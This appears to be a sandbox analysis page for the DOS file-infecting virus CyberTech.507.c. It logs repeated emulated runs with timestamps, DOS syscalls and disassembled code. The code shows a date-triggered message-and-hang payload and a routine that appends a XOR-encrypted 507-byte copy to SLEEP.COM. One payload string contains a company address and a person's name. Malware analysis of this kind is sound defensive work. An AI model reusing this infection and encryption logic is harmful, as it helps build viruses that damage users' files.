Sample viewer

vx.netlux.org/Virus.DOS.CyberTech.507.c

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:19:46.558557694Z 42 PC: 12a73 | Get date 0x12a73: cmp dh, 8
0x12a76: jb 0x12a8c
0x12a78: cmp dl, 0x16
0x12a7b: jb 0x12a8c
0x12a7d: cmp al, 3
0x12a7f: jne 0x12a8c
0x12a81: mov ah, 9
0x12a83: lea dx, word ptr [bp + 0x135]
0x12a87: int 0x21
0x12a89: cli
0x12a8a: jmp 0x12a89
0x12a8c: cmp dh, 5
0x12a8f: jae 0x12a94
0x12a91: jmp 0x12b47
0x12a94: mov ah, 0x1a
0x12a96: mov dx, 0xfc00
0x12a99: int 0x21
0x12a9b: mov ah, 0x4e
0x12a9d: lea dx, word ptr [bp + 0x12f]
0x12aa1: xor cx, cx
2018-12-17T22:19:46.561138175Z 26 PC: 12a9b | Set disk transfer address
2018-12-17T22:19:46.562183057Z 78 PC: 12aa5 | Find first file
2018-12-17T22:19:46.567867284Z 67 PC: 12ab2 | Get or set file attributes
2018-12-17T22:19:46.573568955Z 67 PC: 12aba | Get or set file attributes
2018-12-17T22:19:46.589691226Z 61 PC: 12abf | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:19:46.593887557Z 87 PC: 12ac5 | Get or set file date and time
2018-12-17T22:19:46.595147204Z 63 PC: 12ad2 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:19:46.599469725Z 66 PC: 12af8 | Move file pointer
2018-12-17T22:19:46.600592415Z 44 PC: 12b0b | Get time 0x12b0b: mov byte ptr cs:[bp + 0x18], dl
0x12b10: lea si, word ptr [bp + 4]
0x12b14: mov di, 0xfd00
0x12b17: mov cx, 0x18
0x12b1a: rep movsb byte ptr es:[di], byte ptr [si]
0x12b1c: lea si, word ptr [bp + 0x1c]
0x12b20: mov cx, 0x1e3
0x12b23: lodsb al, byte ptr [si]
0x12b24: xor al, dl
0x12b26: stosb byte ptr es:[di], al
0x12b27: loop 0x12b23
0x12b29: mov ah, 0x40
0x12b2b: mov dx, 0xfd00
0x12b2e: mov cx, 0x1fb
0x12b31: int 0x21
0x12b33: mov ax, 0x4200
0x12b36: call 0x22af2
0x12b39: mov ah, 0x40
0x12b3b: lea dx, word ptr [bp + 0x12c]
0x12b3f: mov cx, 4
2018-12-17T22:19:46.602173885Z 64 PC: 12b33 | Write file or device (Write 507 bytes on handle 5)
2018-12-17T22:19:46.607604834Z 66 PC: 12af8 | Move file pointer
2018-12-17T22:19:46.608600436Z 64 PC: 12b44 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:19:46.612682234Z 87 PC: 12b5d | Get or set file date and time
2018-12-17T22:19:46.614397371Z 62 PC: 12b61 | Close file
2018-12-17T22:19:46.619717793Z 67 PC: 12b6a | Get or set file attributes
2018-12-17T22:19:46.632181994Z 26 PC: 12b4e | Set disk transfer address

{"DateBased":true,"Day":22,"Month":8,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":3412,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:49:00.328981245Z 42 PC: 12a73 | Get date 0x12a73: cmp dh, 8
0x12a76: jb 0x12a8c
0x12a78: cmp dl, 0x16
0x12a7b: jb 0x12a8c
0x12a7d: cmp al, 3
0x12a7f: jne 0x12a8c
0x12a81: mov ah, 9
0x12a83: lea dx, word ptr [bp + 0x135]
0x12a87: int 0x21
0x12a89: cli
0x12a8a: jmp 0x12a89
0x12a8c: cmp dh, 5
0x12a8f: jae 0x12a94
0x12a91: jmp 0x12b47
0x12a94: mov ah, 0x1a
0x12a96: mov dx, 0xfc00
0x12a99: int 0x21
0x12a9b: mov ah, 0x4e
0x12a9d: lea dx, word ptr [bp + 0x12f]
0x12aa1: xor cx, cx
2018-12-25T11:49:00.331909429Z 26 PC: 12a9b | Set disk transfer address
2018-12-25T11:49:00.333711283Z 78 PC: 12aa5 | Find first file
2018-12-25T11:49:00.341421675Z 67 PC: 12ab2 | Get or set file attributes
2018-12-25T11:49:00.348734055Z 67 PC: 12aba | Get or set file attributes
2018-12-25T11:49:01.515658207Z 61 PC: 12abf | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:49:01.523695273Z 87 PC: 12ac5 | Get or set file date and time
2018-12-25T11:49:01.525269631Z 63 PC: 12ad2 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T11:49:01.532317494Z 66 PC: 12af8 | Move file pointer
2018-12-25T11:49:01.534199853Z 44 PC: 12b0b | Get time 0x12b0b: mov byte ptr cs:[bp + 0x18], dl
0x12b10: lea si, word ptr [bp + 4]
0x12b14: mov di, 0xfd00
0x12b17: mov cx, 0x18
0x12b1a: rep movsb byte ptr es:[di], byte ptr [si]
0x12b1c: lea si, word ptr [bp + 0x1c]
0x12b20: mov cx, 0x1e3
0x12b23: lodsb al, byte ptr [si]
0x12b24: xor al, dl
0x12b26: stosb byte ptr es:[di], al
0x12b27: loop 0x12b23
0x12b29: mov ah, 0x40
0x12b2b: mov dx, 0xfd00
0x12b2e: mov cx, 0x1fb
0x12b31: int 0x21
0x12b33: mov ax, 0x4200
0x12b36: call 0x22af2
0x12b39: mov ah, 0x40
0x12b3b: lea dx, word ptr [bp + 0x12c]
0x12b3f: mov cx, 4
2018-12-25T11:49:01.536536227Z 64 PC: 12b33 | Write file or device (Write 507 bytes on handle 5)
2018-12-25T11:49:01.545161176Z 66 PC: 12af8 | Move file pointer (See above)
2018-12-25T11:49:01.54676955Z 64 PC: 12b44 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:49:01.553907784Z 87 PC: 12b5d | Get or set file date and time
2018-12-25T11:49:01.55526328Z 62 PC: 12b61 | Close file
2018-12-25T11:49:01.563973269Z 67 PC: 12b6a | Get or set file attributes
2018-12-25T11:49:01.575291783Z 26 PC: 12b4e | Set disk transfer address

{"DateBased":true,"Day":27,"Month":8,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":3412,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:49:00.419848411Z 42 PC: 12a73 | Get date 0x12a73: cmp dh, 8
0x12a76: jb 0x12a8c
0x12a78: cmp dl, 0x16
0x12a7b: jb 0x12a8c
0x12a7d: cmp al, 3
0x12a7f: jne 0x12a8c
0x12a81: mov ah, 9
0x12a83: lea dx, word ptr [bp + 0x135]
0x12a87: int 0x21
0x12a89: cli
0x12a8a: jmp 0x12a89
0x12a8c: cmp dh, 5
0x12a8f: jae 0x12a94
0x12a91: jmp 0x12b47
0x12a94: mov ah, 0x1a
0x12a96: mov dx, 0xfc00
0x12a99: int 0x21
0x12a9b: mov ah, 0x4e
0x12a9d: lea dx, word ptr [bp + 0x12f]
0x12aa1: xor cx, cx
2018-12-25T11:49:00.42193974Z 9 PC: 12a89 | Display string (String= ' RTL4 Joop van den Ende Produkties BV Marco Daas (Casting Assistent) Postbus 397 1430 AJ AALSMEER van Cleeffkade 15 1413 BA AALSMEER The Netherlands Wedden dat... je een virus hebt? ')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":3412,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:49:00.530753822Z 42 PC: 12a73 | Get date 0x12a73: cmp dh, 8
0x12a76: jb 0x12a8c
0x12a78: cmp dl, 0x16
0x12a7b: jb 0x12a8c
0x12a7d: cmp al, 3
0x12a7f: jne 0x12a8c
0x12a81: mov ah, 9
0x12a83: lea dx, word ptr [bp + 0x135]
0x12a87: int 0x21
0x12a89: cli
0x12a8a: jmp 0x12a89
0x12a8c: cmp dh, 5
0x12a8f: jae 0x12a94
0x12a91: jmp 0x12b47
0x12a94: mov ah, 0x1a
0x12a96: mov dx, 0xfc00
0x12a99: int 0x21
0x12a9b: mov ah, 0x4e
0x12a9d: lea dx, word ptr [bp + 0x12f]
0x12aa1: xor cx, cx
2018-12-25T11:49:00.533375252Z 26 PC: 12b4e | Set disk transfer address

{"DateBased":true,"Day":1,"Month":6,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":3412,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:49:00.934847234Z 42 PC: 12a73 | Get date 0x12a73: cmp dh, 8
0x12a76: jb 0x12a8c
0x12a78: cmp dl, 0x16
0x12a7b: jb 0x12a8c
0x12a7d: cmp al, 3
0x12a7f: jne 0x12a8c
0x12a81: mov ah, 9
0x12a83: lea dx, word ptr [bp + 0x135]
0x12a87: int 0x21
0x12a89: cli
0x12a8a: jmp 0x12a89
0x12a8c: cmp dh, 5
0x12a8f: jae 0x12a94
0x12a91: jmp 0x12b47
0x12a94: mov ah, 0x1a
0x12a96: mov dx, 0xfc00
0x12a99: int 0x21
0x12a9b: mov ah, 0x4e
0x12a9d: lea dx, word ptr [bp + 0x12f]
0x12aa1: xor cx, cx
2018-12-25T11:49:00.937651295Z 26 PC: 12a9b | Set disk transfer address
2018-12-25T11:49:00.938615115Z 78 PC: 12aa5 | Find first file
2018-12-25T11:49:00.945099394Z 67 PC: 12ab2 | Get or set file attributes
2018-12-25T11:49:00.952220487Z 67 PC: 12aba | Get or set file attributes
2018-12-25T11:49:00.967860463Z 61 PC: 12abf | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:49:00.975014814Z 87 PC: 12ac5 | Get or set file date and time
2018-12-25T11:49:00.984107676Z 63 PC: 12ad2 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T11:49:00.991386117Z 66 PC: 12af8 | Move file pointer
2018-12-25T11:49:00.993162066Z 44 PC: 12b0b | Get time 0x12b0b: mov byte ptr cs:[bp + 0x18], dl
0x12b10: lea si, word ptr [bp + 4]
0x12b14: mov di, 0xfd00
0x12b17: mov cx, 0x18
0x12b1a: rep movsb byte ptr es:[di], byte ptr [si]
0x12b1c: lea si, word ptr [bp + 0x1c]
0x12b20: mov cx, 0x1e3
0x12b23: lodsb al, byte ptr [si]
0x12b24: xor al, dl
0x12b26: stosb byte ptr es:[di], al
0x12b27: loop 0x12b23
0x12b29: mov ah, 0x40
0x12b2b: mov dx, 0xfd00
0x12b2e: mov cx, 0x1fb
0x12b31: int 0x21
0x12b33: mov ax, 0x4200
0x12b36: call 0x22af2
0x12b39: mov ah, 0x40
0x12b3b: lea dx, word ptr [bp + 0x12c]
0x12b3f: mov cx, 4
2018-12-25T11:49:00.995636713Z 64 PC: 12b33 | Write file or device (Write 507 bytes on handle 5)
2018-12-25T11:49:01.004118866Z 66 PC: 12af8 | Move file pointer (See above)
2018-12-25T11:49:01.005372833Z 64 PC: 12b44 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:49:01.011992032Z 87 PC: 12b5d | Get or set file date and time
2018-12-25T11:49:01.013699484Z 62 PC: 12b61 | Close file
2018-12-25T11:49:01.021238828Z 67 PC: 12b6a | Get or set file attributes
2018-12-25T11:49:01.031182063Z 26 PC: 12b4e | Set disk transfer address

{"DateBased":true,"Day":1,"Month":8,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":3412,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:49:01.741311159Z 42 PC: 12a73 | Get date 0x12a73: cmp dh, 8
0x12a76: jb 0x12a8c
0x12a78: cmp dl, 0x16
0x12a7b: jb 0x12a8c
0x12a7d: cmp al, 3
0x12a7f: jne 0x12a8c
0x12a81: mov ah, 9
0x12a83: lea dx, word ptr [bp + 0x135]
0x12a87: int 0x21
0x12a89: cli
0x12a8a: jmp 0x12a89
0x12a8c: cmp dh, 5
0x12a8f: jae 0x12a94
0x12a91: jmp 0x12b47
0x12a94: mov ah, 0x1a
0x12a96: mov dx, 0xfc00
0x12a99: int 0x21
0x12a9b: mov ah, 0x4e
0x12a9d: lea dx, word ptr [bp + 0x12f]
0x12aa1: xor cx, cx
2018-12-25T11:49:01.743857399Z 26 PC: 12a9b | Set disk transfer address
2018-12-25T11:49:01.744808473Z 78 PC: 12aa5 | Find first file
2018-12-25T11:49:01.750646258Z 67 PC: 12ab2 | Get or set file attributes
2018-12-25T11:49:01.756571137Z 67 PC: 12aba | Get or set file attributes
2018-12-25T11:49:01.772600645Z 61 PC: 12abf | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:49:01.779058123Z 87 PC: 12ac5 | Get or set file date and time
2018-12-25T11:49:01.780762309Z 63 PC: 12ad2 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T11:49:01.786799836Z 66 PC: 12af8 | Move file pointer
2018-12-25T11:49:01.788003727Z 44 PC: 12b0b | Get time 0x12b0b: mov byte ptr cs:[bp + 0x18], dl
0x12b10: lea si, word ptr [bp + 4]
0x12b14: mov di, 0xfd00
0x12b17: mov cx, 0x18
0x12b1a: rep movsb byte ptr es:[di], byte ptr [si]
0x12b1c: lea si, word ptr [bp + 0x1c]
0x12b20: mov cx, 0x1e3
0x12b23: lodsb al, byte ptr [si]
0x12b24: xor al, dl
0x12b26: stosb byte ptr es:[di], al
0x12b27: loop 0x12b23
0x12b29: mov ah, 0x40
0x12b2b: mov dx, 0xfd00
0x12b2e: mov cx, 0x1fb
0x12b31: int 0x21
0x12b33: mov ax, 0x4200
0x12b36: call 0x22af2
0x12b39: mov ah, 0x40
0x12b3b: lea dx, word ptr [bp + 0x12c]
0x12b3f: mov cx, 4
2018-12-25T11:49:01.790422763Z 64 PC: 12b33 | Write file or device (Write 507 bytes on handle 5)
2018-12-25T11:49:01.798294351Z 66 PC: 12af8 | Move file pointer (See above)
2018-12-25T11:49:01.799302912Z 64 PC: 12b44 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:49:01.80337281Z 87 PC: 12b5d | Get or set file date and time
2018-12-25T11:49:01.805011789Z 62 PC: 12b61 | Close file
2018-12-25T11:49:01.81223854Z 67 PC: 12b6a | Get or set file attributes
2018-12-25T11:49:01.821513987Z 26 PC: 12b4e | Set disk transfer address